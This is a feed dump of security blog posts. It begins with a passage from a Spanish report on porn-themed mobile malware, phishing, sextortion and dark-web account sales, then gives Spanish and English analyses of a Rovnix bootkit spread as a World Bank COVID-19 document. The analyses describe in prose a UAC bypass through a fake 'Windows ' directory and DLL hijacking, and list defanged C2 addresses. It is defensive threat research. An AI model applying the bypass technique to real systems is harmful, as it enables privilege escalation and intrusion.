El análisis de los tipos de amenazas propagadas mediante estos archivos relacionados con pornografía demostró un ligero crecimiento en su variedad: en 2018 encontramos 180 programas maliciosos y familias de not-a-virus que pertenecían a 20 clases de amenazas, en comparación a los 203 de 20 clases en 2019. El adware, un programa utilizado para mostrar y desviar a los usuarios hacia páginas de publicidad no deseada, permaneció en el primer lugar en cuanto a variedad, con un quinto (19%) de archivos maliciosos que eran instaladores de adware. not-a-virus: Las herramientas peligrosas y los troyanos se mantuvieron entre los primeros tres tipos de amenazas en 2018 y 2019, aunque sus porcentajes apenas han variado.

Top 10 de tipos de amenazas móviles que conforman la variedad de categorías de pornografía, en 2018 y 2019. Fuente: Kaspersky Security Network (descargar)

La proporción de troyanos bancarios que cazan credenciales de tarjetas bancarias y de otras plataformas de pagos, cayó del 7% al 5%. Sin embargo, en general, podemos ver que los tipos de amenazas que se han propagado disfrazadas como contenido para adultos apenas ha cambiado en cuanto a su variedad.

Profundizando el análisis de los tipos de amenazas y la medida de su propagación, podemos ver que gran parte de los usuarios han sido atacados con adware detectado como AdWare.AndroidOS.Agent.f.: en 2018,  el 39,23% de los usuarios atacados fueron atacados por esta amenaza, y en 2019, el 35,18%. Además, en 2018 seis de las 10 principales amenazas para usuarios móviles eran adware, mientras que en 2019 eran siete. Esto también confirma que la popularidad del adware sigue en alza.

Top 10 de nombres de detección que representan categorías de pornografía, por el número de usuarios móviles atacados en 2018 y 2019. Fuente: Kaspersky Security Network (descargar)

Este tipo de amenaza suele propagarse a través de varios programas afiliados que ganan dinero por cada instalación o por cada descarga de las aplicaciones maliciosas por parte de las víctimas, un método que ya mencionamos anteriormente.

El análisis general de la prominencia de varios tipos de amenazas muestra que aunque la descarga de contenidos pornográficos desde fuentes no confiables lleva a infecciones con adware, otras amenazas más serias, como las puertas traseras, programas espía y programas secuestradores, también pueden terminar en los dispositivos de usuarios desprevenidos.

Aunque las citas de adultos es un tema que interesa a los ciberdelincuentes (ver la sección sobre phishing y spam), el desarrollo de aplicaciones maliciosas disfrazadas como aplicaciones de citas sexuales no parece llamar su atención. Este año analizamos una variedad de amenazas que se propagaron disfrazadas como aplicaciones populares de citas sexuales. Las aplicaciones de citas sexuales, a diferencia de las aplicaciones de citas comunes, se concentran en encontrar una pareja para encuentros sexuales, lo que significa que estas aplicaciones tienen un público claramente identificado.

Nos interesaba saber si los ciberdelincuentes usaban marcas populares de aplicaciones de citas sexuales para propagar su malware o amenazas del tipo not-a-virus. Sin embargo, el número de usuarios atacados resulto ser ínfimo: apenas 32 en todo 2019. Esto es muchas veces menos en comparación con las aplicaciones de citas comunes, como Bumble o Tinder, por lo que los archivos maliciosos camuflados como aplicaciones de citas sexuales no suelen ser una amenaza para los usuarios. Esto podría atribuirse a que la descarga de dichas aplicaciones exige una mayor privacidad y, por lo tanto, se presta más atención a la legitimidad del recurso.

Nuestra investigación reveló que las muestras de aplicaciones maliciosas usaban las siguientes marcas: Grindr, Down Dating and Tingle. Es importante notar que los programas maliciosos no están conectados de forma alguna con las aplicaciones de citas sexuales y solo utilizan sus marcas para engañar a los usuarios.

Nombre de detección %
not-a-virus:UDS:AdWare.AndroidOS.MobiDash.z 55,17%
not-a-virus:HEUR:AdWare.AndroidOS.MobiDash.z 51,72%
HEUR:Trojan.AndroidOS.Hiddapp.ch 10,34%
HEUR:Trojan.AndroidOS.Hiddapp.cg 6,90%
not-a-virus:HEUR:AdWare.AndroidOS.Mobidash.aj 6,90%

Top 5 de nombres de detecciones de amenazas móviles disfrazadas como aplicaciones de citas para adultos en 2019. Fuente: Kaspersky Security Network

Phishing y spam

Los phishers y los spammers no se resisten al uso de los temas de pornografía. Nuestras tecnologías de filtrado de contenidos nos revelan el tipo de spam y phishihg de pornografía que llegan a los usuarios, además que nos permiten protegerlos.

Es importante notar que las versiones phishing de sitios web no guardan ninguna relación con las plataformas originales. Los ciberdelincuentes copian los sitios web, a menudo hasta con el más mínimo detalle, por lo que un usuario poco preocupado por su seguridad no podría diferenciarlo del original. Para que los sitios webs aparezcan lo más confiables posible, los ciberdelincuentes optan por copiar las plataformas más populares y reconocidas por los usuarios, como Pornhub.com, XNXX.com, y otras. Estos sitios de phishing suelen ser bloqueados por los motores de búsqueda, por lo que se propagan por mensajes de correo de phishing o spam, programas maliciosos o marcos maliciosos que desvían a los usuarios hacia sitios infectados o de publicidad maliciosa (malvertising).

El objetivo común de estas páginas de phishing es recopilar los datos personales de los usuarios (sus credenciales y datos de contacto) para después venderlos o usarlos con fines perversos. Algunos sitios web requieren autorizaciones de redes sociales para acceder al sitio web: esto se hace para confirmar que el usuario es mayor de 18 años. Los ciberdelincuentes replican estas páginas de autorización para capturar las credenciales de redes sociales de los usuarios cuando inician sesión.

Esta página de phishing imita la página de autorización para Pornhub mediante una conocida red social. Una vez que el usuario inicia sesión, sus credenciales de redes sociales caen en manos de los ciberdelincuentes

Las páginas de phishing de pornografía también se usan para propagar programas maliciosos: una vez que el usuario reproduce un video, recibe una notificación de que el reproductor de video necesita una actualización. Sin embargo, el programa que descarga es en realidad un programa malicioso.

Esta copia de phishing del popular sitio XNXX.com imita la página de inicio legítima del sitio, y es prácticamente imposible distinguirla de la original

Otros esquemas de phishing apuntan a las credenciales de billeteras electrónicas y tarjetas de crédito. En estos casos, se induce a la víctima a visitar sitios web de pornografía para ver un video que solo es accesible cuando el usuario se inscribe y proporciona sus datos de pago.

Estafas por spam

Por algunos años no vimos mucha actividad de contenidos de pornografía o sexo en el spam, pero en 2019 la situación cambió. Los mensajes de correo de spam no suelen concentrase en la promoción de contenidos de pornografía como tales, sino que, usando técnicas de ingeniería social, se usan para inducir al usuario a visitar sitios de phishing, extorsionarlos para arrebatarles su dinero o simplemente llevarlo a sitios de publicidad con contenidos explícitos.

El tipo más común de spam es el dedicado a las citas sexuales. Los usuarios reciben mensajes de correo supuestamente enviados por mujeres solitarias que les invitan a charlar en línea. Luego, los usuarios son desviados hacia un nuevo sitio web de citas sexuales con bots que fingen ser atractivas mujeres que luego engatusan a los usuarios para que gasten su dinero en distintos contenidos, como fotos eróticas o acceso premium al sitio web. Los ciberdelincuentes también piden a los usuarios que compartan los datos de sus tarjetas de crédito para poder ‘confirmar su edad’. Huelga decir que estos datos después serán utilizados o revendidos en foros de mercados clandestinos.

Los mensajes de correo dedicados a las citas sexuales pueden verse como publicidad o como mensajes enviados directamente por mujeres

Esta interfaz de una aplicación de citas sexuales muestra varios diálogos de bots que fingen ser atractivas mujeres

A los usuarios se les pide que compartan los datos de sus tarjetas de crédito que se utilizarán para activar una supuesta membresía gratuita en el sitio

También hemos visto spam que promueve juegos de pornografía en línea. Algunos de los mensajes de correo contienen publicidad de plataformas donde los usuarios pueden acceder a juegos para mayores de 18 años, como juegos arcade porno 3D y mirar contenidos explícitos que en realidad llevan a sitios web legítimos. El principal propósito de estos mensajes de correo de spam es la publicidad de estos contenidos.

El mensaje de correo arriba contiene publicidad de un sitio web de juegos porno 3D

Uno de los tipos más oscuros y posiblemente más dañinos de pornospam son los mensajes con chantajes o ‘estafas de extorsión sexual’, que los ciberdelincuentes han estado utilizando por más de tres años. Vimos el surgimiento de estos mensajes en 2018, y sus contenidos se han vuelto cada vez más sofisticados. Esta tendencia continuó en 2019, cuando en toda la web aparecieron nuevas variantes de las estafas.

El esquema funciona así: el usuario recibe mensajes de correo de estafadores que afirman haber hackeado su computadora y haberlo grabado mirando pornografía. Los mensajes continúan diciendo que el remitente tiene la información de contacto de los amigos y familiares de la víctima, así como sus credenciales de redes sociales y que los usará para difundir un video de la víctima grabado con una cámara web. Para que el mensaje suene más convincente aún, el ciberestafador también menciona las tecnologías que supuestamente utilizó para recopilar información sobre la víctima.

Para pretender mayor legitimidad, el extorsionista afirma tener información personal de la víctima, por ejemplo, su contraseña. El ciberestafador puede incluso llegar a revelar la contraseña que supuestamente usa la víctima. Para ello, los ciberdelincuentes usan bases de datos de contraseñas que compran en la web oscura. Puesto que los usuarios suelen tener la misma contraseña para diferentes sitios web, puede resultar fácil convencer a la víctima de que sus dispositivos están intervenidos, incluso si la contraseña no corresponde a ninguna cuenta. Tras asustar a la víctima y convencerla de que su reputación está en riesgo, el estafador exige un pago en bitcoins, e incluso proporciona instrucciones detalladas sobre cómo realizar la transferencia del dinero.

Este mensaje de extorsión sexual muestra la manera en que los ciberdelincuentes intentan convencer a la victima de que ha sido hackeada

El año pasado vimos algunas variaciones de estas estafas: mensaje de correo enviados en otro idioma y el número bitcoin partido en dos, de manera que los sistemas de detección no lo identifiquen como spam. Otro truco de ingeniería social: convencer a la victima de que la novia de uno de sus amigos fue descubierta en cierta situación y chantajeada, pero que se negó a pagar, y se induce al usuario, explotando su curiosidad, a hacer clic en adjuntos maliciosos del mensaje, cuyo único objetivo es descargar malware. Esto demuestra que los ciberdelincuentes no cesan en adaptar sus esquemas en función de los avances en las medidas de seguridad y del comportamiento de los usuarios.

La web oscura y más allá: Un vistazo al mercado detrás de la cortina

La web oscura es el lugar adecuado para entender cómo funciona el mercado de los ciberdelincuentes. Existen varios foros donde se negocia la venta de malware, datos personales, y el intercambio de conocimientos, y a menudo son bastantes prácticos. También reflejan el valor de mercado de los datos personales robados. La venta de datos es como cualquier otro negocio, y la forma en que está organizado es similar a la de cualquier mercado regular, con garantías de parte de los vendedores, una variedad de opciones y precios competitivos.

Ejemplo de una entrada en un foro en 2019, ofrecía cuentas robadas por un precio muy bajo y además proporcionaba recomendaciones para el precio de reventa

Las cuentas premium de sitios web con contenidos para adultos, que tratamos en la sección Cazadores de credenciales en este informe, terminan en los mercados de la web oscura, donde se venden al por mayor y al detalle a precios bajos: a partir de 0,50 USD por cuenta. Las cuentas suelen revenderse en plataformas en la web regular por 5-10 USD, y los vendedores incluso recomiendan los precios de reventa de las cuentas individuales. Además, los compradores de las cuentas robadas a menudo obtienen una garantía de por vida de que las cuentas seguirán funcionando y siendo accesibles, con la opción de remplazar aquellas que ya no estén disponibles. Los ejemplos de abajo muestran cuán extendida es esta práctica: en un solo foro encontramos 210 ofertas de cuentas robadas.

Un ejemplo de un foro ilegal que contiene 210 ofertas de cuentas de pornografía en venta

Las cuentas robadas, por irónico que suene, suelen ser compradas por individuos preocupados por su propia privacidad y que no quieren que sus datos personales, como los detalles de su tarjeta de crédito o su dirección de correo electrónico, queden expuestos. Los compradores a menudo pagan con criptomonedas, lo que les permite permanecer en el anonimato.

Ejemplo de una entrada en un foro en 2019, ofrecía cuentas robadas por un precio muy bajo y además proporcionaba recomendaciones para el precio de reventa. Se ofrecen descuentos por compras al por mayor

Las cuentas premium de sitios de pornografía no son el único contenido para adultos en venta en la web oscura y en foros ilegales en la web regular. Un vistazo al mercado en la web oscura reveló en detalle lo que sucede con una fuga de datos cuando el contenido revelado es crítico. El año pasado vimos numerosos casos de filtraciones desde sitios privados de contenido para adultos, como imágenes captadas por cámaras web, que junto a sus datos personales, devastaron a las víctimas. Pero los creadores de contenidos para adultos no son los únicos que están en riesgo. Si bien las celebridades son los blancos favoritos de estas filtraciones, los usuarios regulares también pueden correr el riesgo de que sus imágenes privadas queden expuestas en la web.

Las bases de datos de imágenes de desnudos suelen ser gratuitas (con un sistema de donaciones para el publicador), pero algunos contenidos de imágenes para adultos, incluyendo imágenes personales filtradas, se venden a precios bastante bajos, como 2 dólares americanos por colección. Este es el precio que los ciberdelincuentes ponen a la vida privada de miles de personas, lo que refleja una perturbadora tendencia que infravalora los datos personales de los usuarios.

Esta captura de pantalla muestra colecciones de imágenes de desnudos, filtradas y recopiladas, vendidas en precios tan bajos como 2 dólares estadounidenes por colección

Este sitio web ofrece la descarga gratuita de videos pornográficos e imágenes de desnudos de varias celebridades

Otra tendencia perturbadora que vimos en el mercado de la web oscura es la extensión del concepto ‘malware como servicio’, con paquetes de contenidos listos para usar e instrucciones diseñadas para usos fraudulentos. Mientras que antes los hackers intercambiaban información sobre cómo engañar a los usuarios o clonar tarjetas, ahora ofrecen su experiencia en otras áreas, incluyendo la extorsión monetaria a sus víctimas interesadas en sexo o simplemente en la atención humana, aunque íntima.

Por ejemplo, en el ejemplo debajo, un usuario ofrece un paquete completo de sextortion con instrucciones para los neófitos. El paquete está diseñado para engañar los usuarios haciéndoles creer que están hablando con una mujer de carne y hueso, y luego les extorsionan su dinero. El paquete incluye no solo imágenes y videos de una supuesta modelo, lo que sin duda le da más credibilidad al truco, sino que también contiene instrucciones sobre cómo usarlo para ganar dinero: según el aviso, es apropiado para “usuarios con y sin experiencia”. Como estímulo adicional, el vendedor ofrece acceso a varias cuentas de pornografía y ciertos regalos, y por si fuera poco, comparte información sobre tutoriales sobre fraudes de su propia creación.

Ejemplo de un paquete de extorsión vendido en el mercado negro

El vendedor incluso llega a describir el valor de su paquete y proporciona tutoriales sobre cómo usar su producto

Hemos visto publicaciones en blogs en las que los ciberdelincuentes comparten su experiencia en la creación y propagación de varios programas maliciosos, incluyendo los secuestradores y de extorsión sexual. Por ejemplo, uno de ellos describía el proceso para crear y propagar programas secuestradores móviles dedicados a la extorsión sexual. Una aplicación usa la cámara frontal para tomar fotos del usuario y, acusándolo de mirar contenidos ilícitos, se le amenaza con distribuir dicha imagen junto a capturas de pantalla del contenido que estaba mirando, a menos que pague para evitarlo. ¿Suena conocido? Eso es porque el método ha estado vigente por años, y no hay vistas de que desaparezcan: mientras haya usuarios desprotegidos y vulnerables, siempre habrá alguien que se aproveche de ellos.

Conclusiones y consejos

Para consumir y producir contenidos para adultos de forma segura, Kaspersky ofrece estos consejos:

Para los usuarios particulares:

  • Prestar atención a la autenticidad del sitio web. No entrar en un sitio web hasta estar completamente seguros de su legitimidad y que su dirección comience con ‘https’. Confirmar que el sitio web sea legítimo verificando el formato de la URL y la correcta ortografía del nombre de la compañía, además de leer las opiniones sobre los sitios que parezcan sospechosos.
  • En caso de comprar una suscripción a un sitios web con contenidos para adultos, solo hacerlo en el sitio web oficial. Verificar la URL del sitio web y asegurarse de que sea auténtica.
  • Verificar los adjuntos de correo con una solución de seguridad antes de abrirlos, especialmente si son de entidades de la web oscura (incluso si se supone que provienen de fuentes anónimas).
  • Parchar los programas instalados en el PC tan pronto como se publiquen las actualizaciones de seguridad.
  • No descargar software pirateado ni otros contenidos ilegales. Incluso si el usuario es desviado a la página web desde un sitio legítimo.
  • Verificar los permisos de las aplicaciones para dispositivos Android, para ver qué tienen permitido hacer cuando se instalan.
  • No instalar aplicaciones desde fuentes no confiables, incluso si son publicitadas de forma activa, y bloquear la instalación de programas desde fuentes desconocidas en la configuración del teléfono.
  • Usar soluciones de seguridad confiables y que cuenten con tecnologías anti-phishing basadas en el análisis de comportamiento, como Kaspersky Security Cloud , para detectar y bloquear ataques spam y phishing. La solución también debe contar con la función de verificación de permisos para Android, que ayuda a los usuarios a identificar peticiones potencialmente peligrosas o cuestionables hechas por la aplicación descargada, y explica los riesgos asociados con diferentes tipos de permisos comunes.

Para empresas:

  • Instruir a los empleados sobre los riesgos del comportamiento descuidado en línea, tanto para sí mismos como para la empresa. Programar capacitaciones sobre concientización sobre seguridad básica para los empleados, como Kaspersky Automated Security Awareness Platform que cubre la seguridad para el correo electrónico y para Internet, entre otras prácticas esenciales.
Contributor:
Copyright:
Category: Publicaciones
Date: Tue, 23 Jun 2020 11:00:12 +0000
Local date: Tue, 23 Jun 2020 11:00:12 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Más vale boot conocido, que nuevo por conocer
Author: Alexander Eremin
Link :
Email :
Description: A mediados de abril, nuestros sistemas de monitoreo de amenazas detectaron unos archivos maliciosos que se distribuían con los nombres "acerca de una nueva iniciativa del Banco Mundial en relación con la epidemia de coronavirus.exe" o "acerca de una nueva iniciativa del Banco Mundial en relación con la epidemia de coronavirus.rar". Dentro de los archivos estaba el conocido bootkit Rovnix.
Full content:

A mediados de abril, nuestros sistemas de monitoreo de amenazas detectaron unos archivos maliciosos que se distribuían con los nombres “acerca de una nueva iniciativa del Banco Mundial en relación con la epidemia de coronavirus.exe” o “acerca de una nueva iniciativa del Banco Mundial en relación con la epidemia de coronavirus.rar”. Dentro de los archivos estaba el conocido bootkit Rovnix. El uso del tema de la pandemia por parte de los ciberdelincuentes no es nuevo; la novedad es que Rovnix se ha convertido en una herramienta para evadir el UAC y se lo utiliza para propagar un inusual descargador. Entonces, procedamos al análisis del malware de acuerdo con todas las reglas de la dramaturgia.

Exposición: el archivo SFX entra en la habitación

El archivo “sobre una nueva iniciativa del Banco Mundial en relación con la epidemia de coronavirus.exe” es un archivo autoextraíble del que salen easymule.exe y 1211.doc.

Script SFX

El documento contiene información sobre una nueva iniciativa del Banco Mundial, y en los metadatos cita como autores a personas reales relacionadas con esta organización.

Contenido del documento 1211.doc

En cuanto a easymule.exe, sus recursos contienen una imagen de mapa de bits, que en realidad es un archivo ejecutable, que se desempaca y se carga en la memoria.

Extracción de la “imagen” contenida en los recursos

Nudo: evasión del UAC

En el código del PE cargado en la memoria, hay, notablemente, muchas partes similares a las del conocido kit de arranque Rovnix y sus módulos, cuyo código fuente “se filtró” en 2013.

A la izquierda está el código fuente del malware y a la derecha está el código fuente filtrado de Rovnix (bksetup.c)

Sin embargo, el archivo analizado contiene innovaciones que los nuevos autores obviamente agregaron, basadas en el código fuente original de Rovnix. Una de ellas es el mecanismo de evasión del UAC que utiliza una técnica conocida como “imitar el directorio de confianza”.

Su esencia es la siguiente: usando la API de Windows, el malware crea el directorio C:\Windows\ System32 (exactamente así, con un espacio después de Windows). Luego, copia allí el ejecutable firmado legítimo de C:\Windows\System32, que tiene derecho a elevar automáticamente los privilegios sin mostrar una solicitud de UAC (en este caso, wusa.exe).

Además, se usa la técnica de secuestro de DLL: en el directorio falso se pone una biblioteca maliciosa con el nombre de una de las bibliotecas importadas por el archivo legítimo (en este caso, wtsapi32.dll) Como resultado, al iniciarse desde un directorio falso, el archivo legítimo wusa.exe (o más bien, la ruta que conduce a éste) pasará la verificación de proxy debido a la API GetLongPathNameW, que elimina de la ruta el carácter de espacio. Sin embargo, el archivo legítimo se iniciará desde el directorio falso sin mediar una solicitud de UAC, y cargará una biblioteca maliciosa llamada wtsapi.dll.

Además de copiar el archivo legítimo del sistema en el directorio falso y crear una biblioteca maliciosa allí, el dropper crea otro archivo con el nombre uninstall.pdg. Después de eso, el malware crea y ejecuta archivos bat que primero ejecutarán wusa.exe  desde el directorio falso, y luego “limpiarán los rastros” eliminando el directorio creado y el cuentagotas easymule.exe.

Desarrollo: los mismos y Rovnix

El archivo uninstall.pdg contiene explícitamente un ejecutable empaquetado. Está diseñado para desempaquetar la misma biblioteca maliciosa que se descargó previamente mediante wusa.exe y el secuestro de DLL.

Uninstall.pdg

El código de la biblioteca maliciosa es diminuto: la función WTSQueryUserToken exportada, obviamente no tiene las funciones requeridas por el wusa.exe original que la importa. En cambio, la función lee el archivo. uninstall.pdg y desempaqueta e inicia un archivo ejecutable desde allí.

Código de la función de biblioteca maliciosa exportada

El uninstall.pdg  desempaquetado resulta ser una DLL con la función de exportación BkInstall, otro indicio de que el malware se basa en el código Rovnix “filtrado”. Un análisis más detallado del archivo lo confirma.

Uninstall.pdg contiene ejecutables “pegados” empaquetados por medio de aPLib. En este caso, el “pegado” se llevó a cabo utilizando la utilidad FJ (también de la suite Rovnix), como lo demuestra el algoritmo de desempaquetado de archivos y las firmas FJ que describen la ubicación del pegado en el archivo.

Firma de la utilidad FJ

Los archivos pegados son el controlador KLoader, elemento del conjunto Rovnix “filtrado” y el descargador. Uninstall.pdg los descomprime, sobrescribe el VBR con el gestor de arranque y coloca el VBR original empaquetado a su lado. Además,  se escribe en el disco controlador-inyector KLoader, cuyo propósito es inyectar la carga útil en los procesos en ejecución.

A la izquierda, el código fuente del malware y a la derecha, el código fuente filtrado de Rovnix (kloader.c)

Como se puede ver en la captura de pantalla, el código fuente del malware no es muy diferente del original. Aparentemente, para que el controlador funcione con la red el código original fue compilado para su uso sin VFS y sin una pila de protocolos.

En el ejemplar que diseccionamos, el controlador inyecta en los procesos una DLL, que es el mismo gestor de arranque atípico de Rovnix del que hablamos al principio.

Por lo tanto, el diagrama de flujo general se ve así.

Esquema de ejecución

Climax: el gestor de arranque

Analicemos en detalle el nuevo gestor de arranque. Lo primero que llama la atención es la ruta pdb en el archivo.

Ruta PDB

Al comienzo de la ejecución, el malware llena la estructura con punteros a funciones. La memoria asignada se llena con punteros a funciones, y en el futuro se los llamará mediante un desplazamiento en el área de memoria asignada.

Estructura con funciones

Después de eso, el proceso obtiene acceso a los objetos “Winsta0” y al escritorio “Predeterminado”, para sí mismo y para todos los procesos creados por este proceso, y crea un hilo con un ciclo de comunicación con el servidor de administración.

Creación del flujo de comunicación con el servidor de administración

Comunicación con el servidor de administración

Después de crear el hilo, el malware usa OpenMutexA para verificar su presencia en el sistema. Luego, comienza un ciclo de comunicación con el servidor de administración, en cuyo marco se forma un paquete de datos sobre el dispositivo infectado. Este paquete se cifra con XOR, con una clave de un solo byte 0xF7, y se envía al servidor de administración.

Estructura de los datos enviados

Como respuesta, el malware recibe un archivo ejecutable que se carga en la memoria. El control se pasa al punto de entrada de este archivo PE.

Visualización del archivo PE cargado en la memoria

Desenlace: la prueba en pleno apogeo

El gestor de arranque no era único: como parte del análisis, se descubrieron varias instancias más. Todos tienen características similares, pero con ligeras diferencias. Por ejemplo, uno de ellos intenta registrar el controlador del servicio NetService para verificar la corrección de su lanzamiento. Si falla (es decir, si el servicio no se está ejecutando en el sistema), el malware deja de funcionar.

Ejemplo de otra versión del gestor de arranque

Otras instancias del cargador no usan el bootkit, pero usan el mismo método para evadir el UAC. Todo parece indicar que en este momento, el gestor de arranque está en etapa de pruebas y se lo equipa con varios medios para evadir los métodos de protección.

También descubrimos instancias que podrían servir como carga útil para el gestor de arranque. Contienen rutas pdb similares y los mismos servidores de administración que los cargadores. Es curioso que las direcciones API requeridas se obtengan por el nombre de la función, que a su vez se obtiene gracias a un índice de la cadena de configuración.

Obtención de las direcciones de la API

Este malware puede, a pedido del servidor de administración, lanzar un archivo exe con los parámetros especificados, grabar sonido desde el micrófono y enviar el archivo de audio al propietario, apagar o reiniciar la computadora, etc.

Procesamiento del comando recibido

El nombre del módulo (E:\LtdProducts\Project\newproject\64bits\64AllSolutions\Release\PcConnect.pdb) indica que los desarrolladores lo posicionan como una puerta trasera, que, además, puede tener elementos de troyano espía, a juzgar por las líneas de configuraciones.

Un fragmento de la configuración. Las cadenas en chino significan “Usuario actual:”, “contraseña de usuario:”, “*** La cuenta del sistema y la contraseña se enumeran a continuación [%04d-%02d-%02d %02d:%02d:%02d] *** “

Epílogo

El análisis del malware camuflado como una “nueva iniciativa del Banco Mundial” mostró que hasta las amenazas bien conocidas como Rovnix pueden traer algunas sorpresas cuando su código fuente se hace público. Al no haber necesidad de desarrollar desde cero sus propios medios para eludir la protección del sistema, los atacantes pueden prestar más atención a las capacidades de su propio malware y agregar un par de “extras” al código fuente, como por ejemplo, omitir el UAC. Los productos de Kaspersky Lab detectan esta amenaza y sus módulos relacionados como Trojan.Win32.Cidox, Trojan.Win32.Genérico, Trojan.Win32.Hesv, Trojan.Win32.Inject.

IOC

7CFC801458D64EF92E210A41B97993B0

E2A88836459088A1D5293EF9CB4B31B7

bamo.ocry[.]com:8433

45.77.244[.]191:8090

45.77.244[.]191:9090

45.77.244[.]191:5050

45.76.145[.]22:8080

149.28.30[.]158:443

Contributor:
Copyright:
Category: Destacados
Date: Tue, 23 Jun 2020 10:00:36 +0000
Local date: Tue, 23 Jun 2020 10:00:36 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Oh, what a boot-iful mornin’
Author: Alexander Eremin
Link :
Email :
Description: In mid-April, our threat monitoring systems detected malicious files being distributed under the name "on the new initiative of the World Bank in connection with the coronavirus pandemic" (in Russian) with the extension EXE or RAR. Inside the files was the well-known Rovnix bootkit.
Full content:

In mid-April, our threat monitoring systems detected malicious files being distributed under the name “on the new initiative of the World Bank in connection with the coronavirus pandemic” (in Russian) with the extension EXE or RAR. Inside the files was the well-known Rovnix bootkit. There is nothing new about cybercriminals exploiting the coronavirus topic; the novelty is that Rovnix has been updated with a UAC bypass tool and is being used to deliver a loader that is unusual for it. Without further ado, let’s proceed to an analysis of the malware according to the rules of dramatic structure.

Exposition: enter SFX archive

The file “on the new initiative of the World Bank in connection with the coronavirus pandemic.exe” is a self-extracting archive that dishes up easymule.exe and 1211.doc.

SFX script

The document does indeed contain information about a new initiative of the World Bank, and real individuals related to the organization are cited as the authors in the metadata.

Contents of 1211.doc

As for easymule.exe, its resources contain a bitmap image that is actually an executable file, which it unpacks and loads into memory.

Loading the “image”

Hook: enter UAC bypass

The code of the PE loaded into memory contains many sections remarkably similar to the known Rovnix bootkit and its modules, the source code of which leaked back in 2013.

Left: source of the malware; right: leaked Rovnix source code (bksetup.c)

However, the file under analysis reveals innovations clearly added by authors, based on the original Rovnix source code. One of them is a UAC bypass mechanism that uses the “mocking trusted directory” technique.

With the aid of the Windows API, the malware creates the directory C:\Windows \System32 (with the space after Windows). It then copies there a legitimate signed executable file from C:\Windows\System32 that has the right to automatically elevate privileges without displaying a UAC request (in this case, wusa.exe).

DLL hijacking is additionally used: a malicious library is placed in the fake directory under the name of one of the libraries imported by the legitimate file (in this case, wtsapi32.dll). As a result, when run from the fake directory, the legitimate file wusa.exe (or rather, the path to it) passes the authorization check due to the GetLongPathNameW API, which removes the space character from the path. At the same time, the legitimate file is run from the fake directory without a UAC request and loads a malicious library called wtsapi.dll.

Besides copying the legitimate system file to the fake directory and creating a malicious library there, the dropper creates another file named uninstall.pdg. After that, the malware creates and runs a series of BAT files that start wusa.exe from the fake directory and then clean up the traces by deleting the created directory and the easymule.exe dropper itself.

Development: enter Rovnix

The file uninstall.pdg clearly contains a packed executable file. It is designed to unpack the same malicious library that was previously downloaded using wusa.exe and DLL hijacking.

Uninstall.pdg

The code of the malicious library is kept minimal: the exported function WTSQueryUserToken obviously has no features required by the original wusa.exe, which imports it. Instead, the function reads uninstall.pdg, and unpacks and runs the executable from it.

Code of exported malicious library function

The unpacked uninstall.pdg turns out to be a DLL with the exported function BkInstall — another indicator that the malware is based on the leaked Rovnix code. Further analysis of the file confirms this.

Glued inside uninstall.pdg are executable files packed with aPLib. The gluing was done using the FJ utility (also from the Rovnix bootkit), as evidenced by the file-unpacking algorithm and the FJ signatures indicating the location of the joint in the file.

FJ utility signature

The glued files are the KLoader driver from the leaked Rovnix bootkit and a bootloader. Uninstall.pdg unpacks them, overwrites the VBR with the bootloader, and places the packed original VBR next to it. In addition, KLoader is written to the disk; its purpose is to inject the payload into running processes.

Left: source code of the malware; right: leaked Rovnix source code (kloader.c)

As seen in the screenshot, the source code of the malware is not much different from the original. The original code was seemingly compiled for use without a VFS and a protocol stack for the driver to operate with the network.

In this instance, the driver injects a DLL into the processes, which is that same un-Rovnix-like loader that we spoke about at the very beginning.

Thus, the general execution scheme looks as follows.

Execution scheme

Climax: enter loader

Let’s consider the new loader in more detail. The first thing to catch the eye is the PDB path in the file.

PDB path

When run, the malware first fills the structure with pointers to functions. The allocated memory is filled with pointers to functions, to be called subsequently by their offset in the allocated memory area.

Structure with functions

Next, the process obtains access to the Winsta0 and Default desktop objects for itself and all processes created by this process, and creates a thread with the C&C communication cycle.

Creating a C&C communication thread

Communication with C&C

Having created the thread, the malware checks its presence in the system using OpenMutexA. It then starts a C&C communication cycle, within which a data packet about the infected device is generated. This packet is XOR-encrypted with the single-byte key 0xF7, and sent to C&C.

Structure of sent data

In response, the malware receives an executable file that is loaded into memory. Control is transferred to the entry point of this PE file.

Displaying the PE file loaded into memory

Denouement: enter testing

The loader turns out not to be unique: several more instances were discovered during the analysis. They all have similar features, but with slight differences. For example, one of them checks that it is running properly by trying to register a NetService handler. If it fails (that is, the service is not running in the system), the malware stops working.

Example of a different version of the loader

Other instances of the loader do not use the bootkit, but do apply the same UAC bypass method. All indications are that the loader is currently being actively tested and equipped with various tools to bypass protection.

We also discovered instances that could serve as a payload for a loader. They contain similar PDB paths and the same C&Cs as the loaders. Interestingly, the addresses of the required APIs are got from the function name, which is obtained from the index in the configuration line.

Getting the API addresses

At the command of C&C, this malware can run an EXE file with the specified parameters, record sound from the microphone and send the audio file to the cybercriminals, turn off or restart the computer, and so on.

Processing a received command

The module name (E:\LtdProducts\Project\newproject\64bits\64AllSolutions\Release\PcConnect.pdb) suggests that the developers are positioning it as a backdoor, which could additionally have Trojan-Spy elements, judging by some configuration lines.

Configuration snippet; the lines in Chinese mean “Current user:”, “user password:”, “***Below are the system account and password [%04d-%02d-%02d %02d:%02d:%02d]***”

Epilogue

Our analysis of malware masquerading as a “new initiative of the World Bank” shows that even well-known threats like Rovnix can throw up a couple of surprises when their source code goes public. Freed from the need to develop their own protection-bypassing tools from scratch, cybercriminals can pay more attention to the capabilities of their own malware and add extra “goodies” to the source code, such as UAC bypass. Kaspersky products detect this threat and its related modules as Trojan.Win32.Cidox, Trojan.Win32.Generic, Trojan.Win32.Hesv, and Trojan.Win32.Inject.

IOC

7CFC801458D64EF92E210A41B97993B0
E2A88836459088A1D5293EF9CB4B31B7
bamo.ocry[.]com:8433
45.77.244[.]191:8090
45.77.244[.]191:9090
45.77.244[.]191:5050
45.76.145[.]22:8080
149.28.30[.]158:443

Contributor:
Copyright:
Category: Featured
Date: Tue, 23 Jun 2020 10:00:08 +0000
Local date: Tue, 23 Jun 2020 10:00:08 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Web skimming with Google Analytics
